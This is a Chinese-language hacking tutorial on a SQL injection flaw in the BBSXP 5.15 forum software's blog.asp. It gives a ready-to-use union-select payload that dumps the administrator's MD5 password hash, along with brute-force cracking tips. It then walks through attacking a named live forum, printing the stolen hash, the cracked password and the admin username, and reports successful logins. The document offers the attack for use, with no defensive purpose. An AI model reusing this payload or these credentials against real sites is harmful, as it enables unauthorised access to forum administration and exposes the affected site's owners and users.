BBSXP5.15最新漏洞精简版

首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 ,漏洞主要出在BLOG.ASP 可以让直接构造数据库命令    
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   
后台区长的md5密码就显示出来了。   
前台密码也可以出来,   
网上已经有相关动画,软件。   
就利用这个漏洞,肯定有一批bbsxp的网站要倒下了   
接下来就是讲工具了,准备好MD5密码破解器   
关于md5的破解,比较好使的有md5cracker速度增强版。   
1。先用8位或9位数字跑。很快。   
2。如果不行,用小写字母跑。选择5-6位比较好。   
3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的,   
   跑上及几个小时。(你的机器配置必须很好)   
4。再不行,建议放弃,太变态了。   
前台ok...后台密码..(注:你必须知道管理员的帐号)   
直接默认的配置就是直接拿下后台密码...   
直接吧前台md5密码暴出来。   
剩下的事就事破解md5了。   
现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]   
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作   
按照上面工具的介绍先用数字把,   
正在破===耐心等等   
我接条信息,大家不介意把~   
出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。   
bBsxp5.15最新漏洞的原始作者不清 

你可能感兴趣的:(BBSXP5.15最新漏洞精简版)